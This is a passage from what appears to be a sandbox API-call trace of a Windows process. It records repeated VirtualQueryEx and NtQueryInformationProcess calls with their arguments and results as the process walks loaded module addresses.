hProcess=0xffffffffffffffff, lpAddress=0x7ff967ed0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff967ed0000, AllocationBase=0x7ff967ed0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.064] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.065] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967eb0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff967eb0000, AllocationBase=0x7ff967eb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.065] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.065] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973ca0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973ca0000, AllocationBase=0x7ff973ca0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.065] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.065] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977650000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977650000, AllocationBase=0x7ff977650000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.065] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.066] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9673a0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9673a0000, AllocationBase=0x7ff9673a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.066] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.066] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f2f0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f2f0000, AllocationBase=0x7ff96f2f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.066] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.067] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967350000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff967350000, AllocationBase=0x7ff967350000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.067] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.067] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967340000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff967340000, AllocationBase=0x7ff967340000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.068] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.068] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974bd0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974bd0000, AllocationBase=0x7ff974bd0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.068] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.068] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967130000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff967130000, AllocationBase=0x7ff967130000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.068] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.069] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972a20000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972a20000, AllocationBase=0x7ff972a20000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.069] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.069] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff969b60000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff969b60000, AllocationBase=0x7ff969b60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.069] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.070] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967010000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff967010000, AllocationBase=0x7ff967010000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.070] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.070] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ff0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966ff0000, AllocationBase=0x7ff966ff0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.070] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.070] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff970ee0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff970ee0000, AllocationBase=0x7ff970ee0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.070] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.070] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b330000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96b330000, AllocationBase=0x7ff96b330000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.071] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.071] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966f10000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966f10000, AllocationBase=0x7ff966f10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.071] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.071] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973bb0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973bb0000, AllocationBase=0x7ff973bb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.071] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.071] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966e30000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966e30000, AllocationBase=0x7ff966e30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.071] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.072] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e000000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96e000000, AllocationBase=0x7ff96e000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.072] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.072] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cc10000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96cc10000, AllocationBase=0x7ff96cc10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.072] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.073] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973be0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973be0000, AllocationBase=0x7ff973be0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.073] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.073] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966de0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966de0000, AllocationBase=0x7ff966de0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.073] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.073] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966d50000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966d50000, AllocationBase=0x7ff966d50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.073] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.074] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966d00000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966d00000, AllocationBase=0x7ff966d00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.074] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.074] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c450000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c450000, AllocationBase=0x7ff96c450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.074] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.075] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968e90000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff968e90000, AllocationBase=0x7ff968e90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.075] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.075] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966b10000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966b10000, AllocationBase=0x7ff966b10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.075] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.078] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cbd0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96cbd0000, AllocationBase=0x7ff96cbd0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.078] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.078] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f50000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971f50000, AllocationBase=0x7ff971f50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.078] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.078] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff976f70000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff976f70000, AllocationBase=0x7ff976f70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.078] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.078] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f40000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971f40000, AllocationBase=0x7ff971f40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.078] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.078] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cf90000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96cf90000, AllocationBase=0x7ff96cf90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.078] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.079] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966af0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966af0000, AllocationBase=0x7ff966af0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.079] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.079] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ad0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966ad0000, AllocationBase=0x7ff966ad0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.079] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.079] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973590000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973590000, AllocationBase=0x7ff973590000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.079] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.080] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977cb0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977cb0000, AllocationBase=0x7ff977cb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.080] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.080] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96d300000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96d300000, AllocationBase=0x7ff96d300000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.080] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.080] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96a270000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96a270000, AllocationBase=0x7ff96a270000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.080] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.081] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974170000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974170000, AllocationBase=0x7ff974170000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.081] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.081] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ac0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966ac0000, AllocationBase=0x7ff966ac0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.081] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.081] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966a90000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966a90000, AllocationBase=0x7ff966a90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.081] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.081] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9667d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9667d0000, AllocationBase=0x7ff9667d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.081] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.082] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b080000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96b080000, AllocationBase=0x7ff96b080000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.082] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.082] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c360000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c360000, AllocationBase=0x7ff96c360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.082] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9664b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9664b0000, AllocationBase=0x7ff9664b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: 